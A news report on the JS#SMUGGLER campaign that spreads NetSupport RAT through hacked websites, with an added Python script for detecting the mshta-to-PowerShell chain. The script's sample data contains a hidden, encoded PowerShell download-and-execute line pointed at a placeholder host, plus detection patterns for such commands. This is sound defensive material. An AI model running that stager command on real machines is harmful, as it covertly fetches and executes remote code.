Experts Confirm JS#SMUGGLER Deploys NetSupport RAT via Compromised Websites

Author: Qoo Media

Cybersecurity researchers have identified a new threat campaign, tracked as JS#SMUGGLER, that abuses compromised websites to distribute the NetSupport Remote Access Trojan (RAT). The campaign uses a multi-stage infection chain that combines an obfuscated JavaScript loader, an HTA payload, and an encrypted PowerShell stager to deploy the malware covertly.

Securonix’s analysis highlights three key components: a hidden JavaScript loader injected into legitimate sites, an HTML Application (HTA) that runs encrypted PowerShell scripts via "mshta.exe," and the final PowerShell payload that downloads the NetSupport RAT. Researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee describe NetSupport RAT as a versatile malware giving attackers full control over victim machines, including remote desktop access, file manipulation, command execution, and data theft.

The initial attack vector involves silent redirects on hacked websites that deliver an obfuscated JavaScript file named "phone.js." This loader profiles the victim’s device and selectively serves malicious content customized for mobile or desktop environments. “This device-aware branching maximizes infection success by tailoring payload delivery while minimizing detection,” said the researchers.

After the JavaScript runs, the chain silently downloads an HTA payload and executes it with "mshta.exe". The HTA launches a PowerShell stager that decrypts and runs the main malicious script entirely in memory, leaving few on-disk artifacts for forensic analysis. That PowerShell payload then retrieves and installs NetSupport RAT, giving the attacker full control of the host.

Securonix assesses that the campaign shows strong signs of an actively maintained, professional operation. The researchers recommend applying strict Content Security Policy (CSP) rules on web properties, monitoring script activity, enabling PowerShell logging (script block and module logging), restricting or blocking "mshta.exe", and deploying behavioral detection to catch the process chain rather than any single file hash.
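The mshta.exe-to-PowerShell chain described above, together with the logging and mshta restriction recommendations, maps directly onto a hunt over process-creation telemetry. The following is an added example written for this page; it is not Securonix's code and not part of the original report. It assumes Sysmon-style Event ID 1 fields (host, parent image, image, command line) already collected into dictionaries; the records, hostnames, paths and URLs in SAMPLE_EVENTS are constructed for illustration, not captured from a real infection.

```python
"""Hunt for a JS#SMUGGLER-style execution chain (mshta.exe launching a
PowerShell stager) in process-creation telemetry.

Added example: not Securonix's code and not from the article. SAMPLE_EVENTS
holds constructed Sysmon-style Event ID 1 fields; hosts, paths and URLs are
hypothetical.
"""
import base64
import ntpath
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Primitives a stager needs to fetch and run code without writing it to disk.
IN_MEMORY_PRIMITIVES = re.compile(
    r"(?i)\b(iex|invoke-expression|downloadstring|downloaddata|frombase64string|"
    r"invoke-webrequest|net\.webclient)\b")


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (Base64 over UTF-16LE).
    Used here only to build the constructed sample record."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand
    argument (PowerShell accepts any unambiguous prefix: -e, -ec, -enc, ...),
    otherwise None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        t = tok.lower()
        if t.startswith("-e") and "-encodedcommand".startswith(t) and i + 1 < len(tokens):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_event(ev: dict) -> list:
    """Return human-readable findings for one process-creation record."""
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev["parent"]).lower()
    cmdline = ev["cmdline"]
    findings = []

    if image == "mshta.exe":
        if parent in BROWSERS:
            findings.append(f"mshta.exe spawned by browser {parent}")
        if re.search(r"(?i)\bhttps?://", cmdline):
            findings.append("mshta.exe passed a remote URL")
        if re.search(r"(?i)\\users\\[^\\]+\\(downloads|appdata)\\", cmdline):
            findings.append("HTA launched from a user-writable directory")

    if image in POWERSHELL:
        if parent == "mshta.exe":
            findings.append("PowerShell spawned by mshta.exe")
        if re.search(r"(?i)-w\w*\s+hidden", cmdline):
            findings.append("hidden window requested")
        if re.search(r"(?i)-e[px]\w*\s+bypass|-nop\b|-noprofile\b", cmdline):
            findings.append("execution policy bypass / no profile")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append("encoded command line")
            if IN_MEMORY_PRIMITIVES.search(decoded):
                findings.append("decoded script fetches and runs code in memory")

    return findings


def hunt(events: list) -> list:
    """Return (host, image basename, findings) for each record with findings."""
    hits = []
    for ev in events:
        findings = analyze_event(ev)
        if findings:
            hits.append((ev["host"], ntpath.basename(ev["image"]).lower(), findings))
    return hits


# Constructed sample telemetry. Record 2 is the stager-like launch; record 3 is
# benign administrative PowerShell use and should not be flagged.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/update.hta"},
    {"host": "WS01", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc " + encode_powershell(STAGER)},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"host": "WS03", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\Downloads\invoice.hta"},
]

if __name__ == "__main__":
    for host, image, findings in hunt(SAMPLE_EVENTS):
        print(f"{host} {image}: {'; '.join(findings)}")
```

The hunt keys on parent/child relationships and launch flags rather than file hashes, which is what the report's "behavioral analysis" advice amounts to in practice: a browser spawning mshta.exe with a URL, and mshta.exe spawning a hidden, encoded PowerShell that decodes to download-and-execute primitives, are each rare in legitimate use and together describe the chain the researchers document. Decoding the -EncodedCommand argument depends on the command line being logged at all, which is why enabling PowerShell and process-creation logging comes first.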

The findings underscore the importance of securing websites and networks against multi-layered web-based malware campaigns. Using compromised websites as delivery platforms makes JS#SMUGGLER particularly challenging to block with traditional defenses, calling for improved cybersecurity hygiene and proactive threat monitoring.

Read more at: thehackernews.com